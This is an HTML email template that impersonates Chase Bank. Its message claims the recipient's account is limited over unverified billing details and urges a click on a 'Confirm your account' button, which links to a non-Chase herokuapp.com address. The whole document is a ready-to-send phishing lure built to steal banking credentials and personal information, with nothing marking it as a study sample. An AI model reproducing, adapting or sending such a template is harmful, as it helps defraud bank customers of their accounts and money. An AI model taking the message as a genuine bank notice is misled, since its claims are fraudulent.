<!DOCTYPE html>
<html lang="en">
<head>
    <style>
        .top{
            padding: 10px 10px;
        }
        .top img{
            margin: 0 auto; display: block; height: 80px !important; min-height: 80px; max-height: 81px;
        }

        .middle{
            font-size: 22px;
            border-top: 1px solid rgb(232,232,232);
            font-family: "Helvetica Neue","Segoe UI",Helvetica,Arial,"Lucida Grande",sans-serif;
            border-bottom: 1px solid rgb(232,232,232);
            color: rgb(3, 36, 56);
            padding: 30px 35px;
            background-color: rgb(245,245,245);
        }

        .bottom{
            font-size: 13px;
            font-family: "Helvetica Neue","Segoe UI",Helvetica,Arial,"Lucida Grande",sans-serif;
            color: rgb(105,105,107);
            padding: 20px 35px;
            line-height: 18px;
        }
        .bottom p{
            padding: 0;
            margin: 0;
            display: block;
        }
        .bottom p span{
            font-weight: 700;
        }
        .bottom a{
            width: 160px;
            margin-top: 40px;
            color: rgb(245,245,245);
            padding: 12px;
            background-color: rgb(0,110,189);
            border-radius: 3px;
            display: block;
            text-align: center;
            text-decoration: none;
        }
        .bottom .cc{
            padding: 0;
            margin: 0;
        }

    </style>

</head>
<body style="margin: 0">
<section>
    <!--top-->
    <div class="top">
        <img src="https://4brf13430svm3bnu053zbxvg-wpengine.netdna-ssl.com/wp-content/uploads/2017/08/Chase-Bank.png" alt="">
    </div>

    <!--middle-->
    <div class="middle">
        Your&nbsp;Chase Account&nbsp;is limited.
        <br>
        Please ensure your billing information is up-to-date.
    </div>

    <!--bottom-->
    <div class="bottom">
        <p>Dear valued client,</p>
        <p>&nbsp;</p>
        <p>We are sorry to inform you that we weren't able to confirm the validity of
            your current billing information with our automatic monthly billing
            renewal service.
        </p>
        <p>&nbsp;</p>
        <p>
            <span>Why is my&nbsp;Chase service limited?</span>
            <br>
            We were unable to validate your current billing address and/or phone number.
        </p>
        <p>&nbsp;</p>
        <p>
                <span>
                    What can I do to resolve the problem?
                </span>
            <br>
            You must update your address and phone number on your account by clicking
            the link below and following the steps. The process takes less than 30
            seconds.
        </p>
        <p>&nbsp;</p>

        <a href="https://secure05b.herokuapp.com/_yesssh5/Safety/Chase/n/1eb932e5745c485929f49dbefcebbb33">
            Confirm your account
        </a>
        <p>&nbsp;</p>
        <p class="cc">Copyright © 1999-2018&nbsp;Service-Online All rights reserved.</p>
        <p>&nbsp;</p>
    </div>
</section>
</body>
</html>